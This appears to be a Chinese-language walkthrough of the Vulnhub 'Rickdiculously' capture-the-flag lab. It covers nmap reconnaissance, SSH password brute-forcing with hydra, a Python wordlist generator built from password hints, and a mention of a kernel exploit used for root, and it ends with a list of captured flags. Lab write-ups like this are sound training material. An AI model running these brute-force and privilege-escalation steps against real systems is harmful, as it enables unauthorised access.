0%

Vulnhub-Rickdiculously

0x01 信息收集

NMAP扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-17 22:37 CST
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 71.43% done; ETC: 22:38 (0:00:02 remaining)
Nmap scan report for 192.168.56.5
Host is up (0.00091s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.254
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh?
| fingerprint-strings:
| NULL:
|_ Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp open http Cockpit web service
|_http-title: Did not follow redirect to https://192.168.56.5:9090/
13337/tcp open unknown
| fingerprint-strings:
| NULL:
|_ FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
| 256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_ 256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (ED25519)
60000/tcp open tcpwrapped
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.80%I=7%D=7/17%Time=5F11B7C2%P=x86_64-unknown-linux-gnu%r
SF:(NULL,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x2
SF:04\.4\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.80%I=7%D=7/17%Time=5F11B7C2%P=x86_64-unknown-linux-gn
SF:u%r(NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.53 seconds

分析

  • 21端口的vsftpd能够匿名登录。并且拥有pub目录可读。
  • 22端口,连接上去后说不定能获得一些banner信息,可能是另外的服务。
  • 80端口是web网站,httpd2.4.27
  • 9090端口是服务器控制台?
  • 13337直接就告诉了我们一个falg,但是不知道是什么东西,需要nc连接看看。
  • 22222又是一个ssh端口,这个可能才是真ssh
  • 60000不知道是什么。

ftp

ftp目录下只有一个flag文件可读,pub目录并没有其他的文件。并且没有目录遍历。线索可能到此为止。不过接下来还是可以考虑爆破用户名的。

22端口 ssh?

1
2
$ nc 192.168.56.5 22
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)

只有一个系统版本的banner信息。

80端口 HTTP

目录扫描结果

首页

robots

passwords

passwords.html

这里告诉里我们一个密码,但是并不知道帐号是什么,也不知道这是什么服务的密码。

cgi-bin下面有一个root_shell,但是访问是在建设中。tracertool.cgi则是一个路由追踪。大概能命令执行?(不过尝试之后,发现过滤的很严。)

HTTPS-9090

这是一个登录页面,但是实际上我尝试了很多操作都没用。。。(兔子洞。

13337

nc进来发现只有一个flag。

60000

nc进来能发现是root权限,但是除了查看flag。执行不了其他操作

22222

实在是没办法了,只能ssh爆破,密码是在80端口找到的password

1
hydra -L ~/tools/rockyou.txt  -p ******  -s 22222 ssh://192.168.56.5 -vV -f -t 64

结果成功爆破出来了。

1
[22222][ssh] host: 192.168.56.5   login: Summer   password: ******

0x02 提权

正常道路

通过ssh爆破密码,登录进去之后,会发现cat被禁用了。所以只能使用less 或者 More。进行了一波信息收集后,在Morty目录下会发现journal.txt.zip和safe_password.jpg.下载图片到本地binwalk分析后,会给出密码。用给出的密码解压journal.txt.zip.会提示RickSanchez的RICES_SAFE目录下有一个safe文件。

这应该是个二进制程序,只有输入正确的内容,才会回显示。但是我们需要先将这个文件 copy到summer的家目录下才能运行。

输入safe 131333

1
2
3
4
5
6
7
8
9
10
11
[[email protected] ~]$ ./safe 131333
decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name. @

密码提示:1个大写字母,1个数字,还有一个单词。生成字典文件。乐队名字稍微谷歌一下就能找到了。

get-password
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
word = ['The', 'Flesh', 'Curtains']
c = []
for i in range(65, 91):
for j in range(0, 10):
for z in word:
c.append(chr(i) + str(j) + z)
c.append(chr(i) + z + str(j))
c.append(str(j) + chr(i) + z)
c.append(str(j) + z + chr(i))
c.append(z + chr(i) + str(j))
c.append(z + str(j) + chr(i))

for i in c:
with open('rick-password.txt', 'a+') as f:
print(i, file=f, sep='\n')

最后爆破RickSanchez的密码。

1
2
hydra -l RickSanchez  -P rick-password.txt  -s 22222 ssh://192.168.56.5 -vV -f -t 64
[22222][ssh] host: 192.168.56.5 login: RickSanchez password: *********

无须多言。

内核利用

看了内核版本后,发现是4.11.8-300,搜索一下后,发现有exp直接利用。但是目标机器本地没有gcc,所以要在自己的机器上编译后上传。然后运行就是root了

0x03 FLAG

  1. FTP-21(FLAG{Whoa this is unexpected} - 10 Points)
  2. HTTP-80(FLAG{Yeah d- just don’t do it.} - 10 Points)
  3. HTTPS-9090(FLAG {There is no Zeus, in your face!} - 10 Points)
  4. 13337(FLAG:{TheyFoundMyBackDoorMorty}-10Points)
  5. 60000(FLAG{Flip the pickle Morty!} - 10 Points)
  6. 22222-Summer(FLAG{Get off the high road Summer!} - 10 Points)
  7. journal.txt.zip(FLAG: {131333}} - 20 Points)
  8. /home/RickSanchez/RICKS_SAFE/safe FLAG{And Awwwaaaaayyyy we Go!} - 20 Points}
  9. /root/FLAG.txt(FLAG: {Ionic Defibrillator} - 30 points)